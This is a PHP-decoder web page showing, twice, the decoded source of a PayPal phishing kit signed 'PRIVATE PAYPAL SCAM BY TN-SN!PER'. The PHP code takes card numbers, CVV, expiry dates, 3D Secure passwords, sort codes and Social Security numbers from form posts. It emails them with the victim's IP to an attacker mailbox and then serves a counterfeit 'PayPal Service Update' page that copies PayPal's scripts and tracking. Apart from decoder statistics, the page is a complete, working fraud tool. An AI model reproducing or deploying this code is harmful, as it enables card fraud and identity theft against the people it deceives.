Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? /* PRIVATE PAYPAL SCAM BY TN-SN!PER GREETZ TO DARCK PIRATOS & ADELS..
Decoded Output download
<?
/*
PRIVATE PAYPAL SCAM
BY TN-SN!PER
GREETZ TO
DARCK PIRATOS & ADELSS04
*/
session_start();
$firstname = $_SESSION['_fn'] ;
$lastname = $_SESSION['_ln'];
/*========== [ Variables ]==========*/
$ip = getenv("REMOTE_ADDR");
$cardholder = $_POST['_fulln'];
$cardnumber = $_POST['_ccn'];
$ccv = $_POST['_ccv'];
$expm = $_POST['_expm'];
$expy = $_POST['_expy'];
$secure3d = $_POST['_3d'];
$sortcode = $_POST['_sortc'];
$ssn1 = $_POST['_ssn1'];
$ssn2 = $_POST['_ssn2'];
$ssn3 = $_POST['_ssn3'];
/*========== [ Variables ]==========*/
$message = "
=========[VBV INFOS]=========
Card Holder : $cardholder
Card Number : $cardnumber
CVC : $ccv
Exp Date : $expm / $expy
3D / VBV : $secure3d
Sort Code : $sortcode
SSN : $ssn1 - $ssn2 - $ssn3
===============[IP]==============
IP : http://www.geoiptool.com/?IP=$ip
==========[BY TN-SN!PER]=========";
$to = "[email protected]"; // Email \
$subject = "VBV INFOS FROM [$ip]";
$headers = "From: TN-SN!PER <[email protected]>";
$headers .= $_POST['eMailAdd']."
";
$headers .= "MIME-Version: 1.0
";
mail($to, $subject, $message,$headers);
?>
<!DOCTYPE html>
<html lang="en" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js " data-device-type="desktop">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="./js/modernizr-2.7.0.js"></script>
<meta charset="utf-8">
<link rel="shortcut icon" href="./img/pp_favicon_x.ico">
<link rel="apple-touch-icon" href="./img/apple-touch-icon.png">
<title>PayPal Service Update</title>
<link rel="stylesheet" href="./css/app.css">
<link type="text/css" rel="stylesheet" href="./css/a_23_-1010506237.css">
<script type="text/javascript" src="./js/a_23_-1984923970.js"></script>
<SCRIPT LANGUAGE="JavaScript">
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=660,height=396,left = 565.5,top = 149');");
}
</script>
<SCRIPT language="Javascript">
function isNumberKey(evt)
{
var charCode = (evt.which) ? evt.which : event.keyCode
if (charCode > 31 && (charCode < 48 || charCode > 57))
return false;
return true;
}
function ValidateAlpha(evt)
{
var keyCode = (evt.which) ? evt.which : evt.keyCode
if ((keyCode < 65 || keyCode > 90) && (keyCode < 97 || keyCode > 123) && keyCode != 32)
return false;
return true;
}
</SCRIPT>
<script src="./is/head.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="main" src="./js/main.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="view/summary/index" src="./js/index.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="lib/business/businessHelper" src="./js/businessHelper.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="widget/explore" src="./js/explore.js"></script>
</head>
<body id="page">
<header>
<? include ("./banking/header.php"); ?>
</header>
<div class="betaBannerMainWrapper"></div>
<div class="containerCentered" id="content" role="content" tabindex="-1">
<div class="layout" id="index">
<section class="">
<div class="row-fluid">
<div class="span4" id="homePage">
<? include ("./billing/tools.php"); ?>
<? include ("./billing/enabledby.php"); ?>
</div>
<div class="span8 actTile">
<? include ("./banking/form.php"); ?>
</div>
</div>
</section>
</div>
<input type="hidden" id="notesContent" value="Remarque :">
<input type="hidden" id="transactionsFetchLimit" value="8">
</div>
<footer role="navigation">
<? include ("./banking/footer.php"); ?>
</footer>
<script type="text/javascript" src="./js/pp_jscode_080706.js"></script>
<script type="text/javascript">
s.pageName = "main:business:::home";
s.channel = "business";
s.hier1 = "main_business__";
s.eVar31 = "main:business:::home";
s.eVar25 = "main:business:::home:::";
s.prop25 = "main:business:::home:::";
s.prop1 = "businesshubspartaweb/WEB-INF/templates/summary/index.dust";
s.prop35 = "in";
s.prop37 = "::";
s.prop40 = "65d4000c75d70";
s.prop30 = "glb";
s.prop50 = "fr_FR";
s.eVar61 = "41283c888012c69177d915b597f5f6b5";
s.eVar62 = "beta";
s.prop62 = "beta";
s.eVar66 = "||";
s.prop71 = "Sparta";
s.event = "event17";
s.eVar6 = "business::";
s.prop6 = "YM2835PF9WQXJ";
s.prop7 = "business";
s.prop8 = "unverified";
s.prop9 = "unrestricted";
s.prop10 = "FR";
s.prop80 = "testVarRemoveMe"; /************ DO NOT ALTER ANYTHING BELOW THIS LINE ! *************/
function scOnload() {
var s_code = s.t();
if (s_code) document.write(s_code);
}
if (window.addEventListener) {
window.addEventListener('load', scOnload, false);
} else if (window.attachEvent) {
window.attachEvent('onload', scOnload);
};
if (navigator.appVersion.indexOf('MSIE') >= 0) document.write(unescape('%3C') + '!-' + '-')
</script>
<noscript><img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" alt="" height="1" width="1" border="0"></noscript>
<!-- DO NOT REMOVE THIS COMMENT -->
<script type="text/javascript" src="./js/pa.js"></script>
<script type="text/javascript">
(function () {
if (typeof PAYPAL.analytics != "undefined") {
PAYPAL.core = PAYPAL.core || {};
PAYPAL.core.pta = PAYPAL.analytics.setup({
data: 'pgrp=main%3Abusiness%3A%3A%3Ahome&page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&lgin=in&vers=%3A%3A&calc=65d4000c75d70&rsta=fr_FR&md5h=41283c888012c69177d915b597f5f6b5&shfp=%7C%7C&usce=beta&pgtf=Sparta&s=ci&goal=event17&flnm=business%3A%3A&cust=YM2835PF9WQXJ&acnt=business&aver=unverified&rstr=unrestricted&pfid=65d4000c75d70&s.prop80=testVarRemoveMe',
url: '\/\/t.paypal.com\/ts'
});
}
}());
</script>
<noscript><img src="https://t.paypal.com/ts?nojs=1&pgrp=main%3Abusiness%3A%3A%3Ahome&page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&lgin=in&vers=%3A%3A&calc=65d4000c75d70&rsta=fr_FR&md5h=41283c888012c69177d915b597f5f6b5&shfp=%7C%7C&usce=beta&pgtf=Sparta&s=ci&goal=event17&flnm=business%3A%3A&cust=YM2835PF9WQXJ&acnt=business&aver=unverified&rstr=unrestricted&pfid=65d4000c75d70&s.prop80=testVarRemoveMe" alt="" height="1" width="1" border="0"></noscript>
<script data-main="https://www.paypalobjects.com/eboxapps/js/cc/828c80ba7a7ce05c22cf35736ef9b3/main" src="./js/require-2.0.1.js"></script>
<div class="exploreModal"></div>
</body>
</html>
Did this file decode correctly?
Original Code
<?
/*
PRIVATE PAYPAL SCAM
BY TN-SN!PER
GREETZ TO
DARCK PIRATOS & ADELSS04
*/
session_start();
$firstname = $_SESSION['_fn'] ;
$lastname = $_SESSION['_ln'];
/*========== [ Variables ]==========*/
$ip = getenv("REMOTE_ADDR");
$cardholder = $_POST['_fulln'];
$cardnumber = $_POST['_ccn'];
$ccv = $_POST['_ccv'];
$expm = $_POST['_expm'];
$expy = $_POST['_expy'];
$secure3d = $_POST['_3d'];
$sortcode = $_POST['_sortc'];
$ssn1 = $_POST['_ssn1'];
$ssn2 = $_POST['_ssn2'];
$ssn3 = $_POST['_ssn3'];
/*========== [ Variables ]==========*/
$message = "
=========[VBV INFOS]=========
Card Holder : $cardholder
Card Number : $cardnumber
CVC : $ccv
Exp Date : $expm / $expy
3D / VBV : $secure3d
Sort Code : $sortcode
SSN : $ssn1 - $ssn2 - $ssn3
===============[IP]==============
IP : http://www.geoiptool.com/?IP=$ip
==========[BY TN-SN!PER]=========";
$to = "[email protected]"; // Email \\
$subject = "VBV INFOS FROM [$ip]";
$headers = "From: TN-SN!PER <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($to, $subject, $message,$headers);
?>
<!DOCTYPE html>
<html lang="en" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths js " data-device-type="desktop">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="./js/modernizr-2.7.0.js"></script>
<meta charset="utf-8">
<link rel="shortcut icon" href="./img/pp_favicon_x.ico">
<link rel="apple-touch-icon" href="./img/apple-touch-icon.png">
<title>PayPal Service Update</title>
<link rel="stylesheet" href="./css/app.css">
<link type="text/css" rel="stylesheet" href="./css/a_23_-1010506237.css">
<script type="text/javascript" src="./js/a_23_-1984923970.js"></script>
<SCRIPT LANGUAGE="JavaScript">
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=660,height=396,left = 565.5,top = 149');");
}
</script>
<SCRIPT language="Javascript">
function isNumberKey(evt)
{
var charCode = (evt.which) ? evt.which : event.keyCode
if (charCode > 31 && (charCode < 48 || charCode > 57))
return false;
return true;
}
function ValidateAlpha(evt)
{
var keyCode = (evt.which) ? evt.which : evt.keyCode
if ((keyCode < 65 || keyCode > 90) && (keyCode < 97 || keyCode > 123) && keyCode != 32)
return false;
return true;
}
</SCRIPT>
<script src="./is/head.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="main" src="./js/main.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="view/summary/index" src="./js/index.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="lib/business/businessHelper" src="./js/businessHelper.js"></script>
<script type="text/javascript" charset="utf-8" data-requirecontext="_" data-requiremodule="widget/explore" src="./js/explore.js"></script>
</head>
<body id="page">
<header>
<? include ("./banking/header.php"); ?>
</header>
<div class="betaBannerMainWrapper"></div>
<div class="containerCentered" id="content" role="content" tabindex="-1">
<div class="layout" id="index">
<section class="">
<div class="row-fluid">
<div class="span4" id="homePage">
<? include ("./billing/tools.php"); ?>
<? include ("./billing/enabledby.php"); ?>
</div>
<div class="span8 actTile">
<? include ("./banking/form.php"); ?>
</div>
</div>
</section>
</div>
<input type="hidden" id="notesContent" value="Remarque :">
<input type="hidden" id="transactionsFetchLimit" value="8">
</div>
<footer role="navigation">
<? include ("./banking/footer.php"); ?>
</footer>
<script type="text/javascript" src="./js/pp_jscode_080706.js"></script>
<script type="text/javascript">
s.pageName = "main\x3Abusiness\x3A\x3A\x3Ahome";
s.channel = "business";
s.hier1 = "main_business__";
s.eVar31 = "main\x3Abusiness\x3A\x3A\x3Ahome";
s.eVar25 = "main\x3Abusiness\x3A\x3A\x3Ahome\x3A\x3A\x3A";
s.prop25 = "main\x3Abusiness\x3A\x3A\x3Ahome\x3A\x3A\x3A";
s.prop1 = "businesshubspartaweb\x2FWEB-INF\x2Ftemplates\x2Fsummary\x2Findex.dust";
s.prop35 = "in";
s.prop37 = "\x3A\x3A";
s.prop40 = "65d4000c75d70";
s.prop30 = "glb";
s.prop50 = "fr_FR";
s.eVar61 = "41283c888012c69177d915b597f5f6b5";
s.eVar62 = "beta";
s.prop62 = "beta";
s.eVar66 = "\x7C\x7C";
s.prop71 = "Sparta";
s.event = "event17";
s.eVar6 = "business\x3A\x3A";
s.prop6 = "YM2835PF9WQXJ";
s.prop7 = "business";
s.prop8 = "unverified";
s.prop9 = "unrestricted";
s.prop10 = "FR";
s.prop80 = "testVarRemoveMe"; /************ DO NOT ALTER ANYTHING BELOW THIS LINE ! *************/
function scOnload() {
var s_code = s.t();
if (s_code) document.write(s_code);
}
if (window.addEventListener) {
window.addEventListener('load', scOnload, false);
} else if (window.attachEvent) {
window.attachEvent('onload', scOnload);
};
if (navigator.appVersion.indexOf('MSIE') >= 0) document.write(unescape('%3C') + '!-' + '-')
</script>
<noscript><img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" alt="" height="1" width="1" border="0"></noscript>
<!-- DO NOT REMOVE THIS COMMENT -->
<script type="text/javascript" src="./js/pa.js"></script>
<script type="text/javascript">
(function () {
if (typeof PAYPAL.analytics != "undefined") {
PAYPAL.core = PAYPAL.core || {};
PAYPAL.core.pta = PAYPAL.analytics.setup({
data: 'pgrp=main%3Abusiness%3A%3A%3Ahome&page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&lgin=in&vers=%3A%3A&calc=65d4000c75d70&rsta=fr_FR&md5h=41283c888012c69177d915b597f5f6b5&shfp=%7C%7C&usce=beta&pgtf=Sparta&s=ci&goal=event17&flnm=business%3A%3A&cust=YM2835PF9WQXJ&acnt=business&aver=unverified&rstr=unrestricted&pfid=65d4000c75d70&s.prop80=testVarRemoveMe',
url: '\/\/t.paypal.com\/ts'
});
}
}());
</script>
<noscript><img src="https://t.paypal.com/ts?nojs=1&pgrp=main%3Abusiness%3A%3A%3Ahome&page=main%3Abusiness%3A%3A%3Ahome%3A%3A%3A&tmpl=businesshubspartaweb%2FWEB-INF%2Ftemplates%2Fsummary%2Findex.dust&lgin=in&vers=%3A%3A&calc=65d4000c75d70&rsta=fr_FR&md5h=41283c888012c69177d915b597f5f6b5&shfp=%7C%7C&usce=beta&pgtf=Sparta&s=ci&goal=event17&flnm=business%3A%3A&cust=YM2835PF9WQXJ&acnt=business&aver=unverified&rstr=unrestricted&pfid=65d4000c75d70&s.prop80=testVarRemoveMe" alt="" height="1" width="1" border="0"></noscript>
<script data-main="https://www.paypalobjects.com/eboxapps/js/cc/828c80ba7a7ce05c22cf35736ef9b3/main" src="./js/require-2.0.1.js"></script>
<div class="exploreModal"></div>
</body>
</html>
Function Calls
getenv | 1 |
session_start | 1 |
Stats
MD5 | 546bd4322fd3e2769254a350a90f2766 |
Eval Count | 0 |
Decode Time | 93 ms |